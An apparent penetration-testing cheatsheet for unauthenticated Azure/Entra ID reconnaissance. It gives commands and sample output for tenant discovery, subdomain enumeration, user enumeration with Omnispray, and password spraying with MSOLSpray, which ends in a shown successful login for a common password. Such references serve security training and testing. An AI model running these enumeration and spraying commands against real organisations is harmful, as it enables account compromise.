Cheatsheet - Azure - Unauthenticated reconnaissance
Check if domain is using Entra ID for authentication
Manual
Visiting the following URL:
https://login.microsoftonline.com/getuserrealm.srf?login=COMPANYDOMAIN&xml=1
and replacing COMPANYDOMAIN with the target domain will yield the following output should the company be using Entra ID for authentication:
<RealmInfo Success="true">
<State>4</State>
<UserState>1</UserState>
<Login>megabigtech.com</Login>
**<NameSpaceType>Managed</NameSpaceType>**
<DomainName>megabigtech.com</DomainName>
<IsFederatedNS>false</IsFederatedNS>
<FederationBrandName>Default Directory</FederationBrandName>
<CloudInstanceName>microsoftonline.com</CloudInstanceName>
<CloudInstanceIssuerUri>urn:federation:MicrosoftOnline</CloudInstanceIssuerUri>
</RealmInfo>
Note the NameSpaceType of Managed which indicates that the target organisation is using Entra ID.
Automated - via AADInternals
Install and import the required module:
Install-Module AADInternals
Import-Module AADInternals
We can then run the following:
Get-AADIntLoginInformation -Domain COMPANYDOMAIN
Example output:
Has Password : True
Federation Protocol :
Pref Credential : 1
Consumer Domain :
Cloud Instance audience urn : urn:federation:MicrosoftOnline
Authentication Url :
Throttle Status : 0
Account Type : Managed
Federation Active Authentication Url :
Exists : 1
Federation Metadata Url :
Desktop Sso Enabled :
Tenant Banner Logo :
Tenant Locale :
Cloud Instance : microsoftonline.com
State : 4
Domain Type : 3
Domain Name : megabigtech.com
Tenant Banner Illustration :
Federation Brand Name : Default Directory
Federation Global Version :
User State : 1
Locate information pertaining to the tenant
Manual
Visiting the following URL:
https://login.microsoftonline.com/COMPANYDOMAIN/.well-known/openid-configuration
will provide us with the tenant ID for the account, 2590ccef-687d-493b-ae8d-441cbab63a72.
"token_endpoint": "https://login.microsoftonline.com/2590ccef-687d-493b-ae8d-441cbab63a72/oauth2/token",
"token_endpoint_auth_methods_supported": [
"client_secret_post",
"private_key_jwt",
"client_secret_basic"
]
Automated - via AADInternals
Install and import the required module:
Install-Module AADInternals
Import-Module AADInternals
We can then run the following:
Get-AADIntTenantID -Domain COMPANYDOMAIN
Perform tenant recon via AADInternals
Lookup various domain information for a given domain:
Invoke-AADIntReconAsOutsider -DomainName COMPANYDOMAIN
Example output:
Tenant brand: Default Directory Tenant name: iancloudpwned.onmicrosoft.com Tenant id: 2590ccef-687d-493b-ae8d-441cbab63a72 Tenant region: EU
DesktopSSO enabled: False
Name : iancloudpwned.mail.onmicrosoft.com
DNS : True
MX : True
SPF : True
DMARC : False
DKIM : False
MTA-STS : False
Type : Managed
STS :
Name : iancloudpwned.onmicrosoft.com
DNS : True
MX : True
SPF : True
DMARC : False
DKIM : False
MTA-STS : False
Type : Managed
STS :
Name : international-am.com
DNS : True
MX : True
SPF : True
DMARC : False
DKIM : False
MTA-STS : False
Type : Managed
STS :
Name : megabigtech.com
DNS : True
MX : True
SPF : True
DMARC : False
DKIM : False
MTA-STS : False
Type : Managed
STS :
Locate well known subdomains
Azure has a few well known subdomains for common services, such as vault.azure.net for Azure Key Vault, and blob.core.windows.net for Azure Blob Storage. A full list of Azure subdomains can be found here.
These can be enumerate for a given target using the tool AzSubEnum
Setup:
git clone https://github.com/yuyudhn/AzSubEnum
pip3 install -r requirement.txt
Run:
python3 azsubenum.py -b <COMPANYNAME | e.g. megabigtech> --thread 10
Example output:
Discovered Subdomains:
App Services:
-----------------------------------
megabigtech.azurewebsites.net
App Services - Management:
---------------------------------------
megabigtech.scm.azurewebsites.net
Password spraying/credential stuffing
Omnispray - user enumeration
Link: https://github.com/0xZDH/Omnispray
Omnispray aims to replace tools such as [o365spray](https://github.com/0xZDH/o365spray) and provide a modular framework to expand enumeration and spraying beyond just a single target/application.
We can create a users.txt file that contains a list of potentially valid logon addresses for users in the tenant. Then, we can run the following command:
python3 omnispray.py --type enum -uf users.txt --module o365_enum_office
Example output:
*** Omnispray ***
>---------------------------------------<
> version : 0.1.4
> module : o365_enum_office
> type : enum
> userfile : users.txt
> count : 1 passwords/spray
> lockout : 15.0 minutes
> wait : 5.0
> timeout : 25 seconds
> pause : 0.25 seconds
> rate : 10 threads
> start : 2025-01-07 11:27:51
>---------------------------------------<
/opt/Omnispray/omnispray.py:319: DeprecationWarning: There is no current event loop
loop = asyncio.get_event_loop()
[2025-01-07 11:27:51,286] INFO : Generating prerequisite data via office.com...
[2025-01-07 11:27:52,059] INFO : Enumerating 4 users via 'o365_enum_office' module
[2025-01-07 11:27:53,595] INFO : [ + ] yuki.tanaka@megabigtech.com
The example output above has indicated that there is a valid user account, yuki.tanaka@megabigtech.com within the tenant.
MSOLSpray - password spraying/credential stuffing
MSOLSpray can be downloaded from the following repo:
https://github.com/dafthack/MSOLSpray/archive/master.zip
We can then dot source the file via: . .\MSOLSpray.ps1, then we can target the a list of user accounts against a common password (for instance):
Invoke-MSOLSpray -UserList user.txt -Password "Welcome123" -Verbose
Example output:
[*] There are 1 total users to spray.
[*] Now spraying Microsoft Online.
[*] Current date and time: 01/06/2025 17:37:51
VERBOSE: POST https://login.microsoft.com/common/oauth2/token with -1-byte payload
VERBOSE: received 3718-byte response of content type application/json; charset=utf-8
[*] SUCCESS! yuki.tanaka@megabigtech.com : Welcome123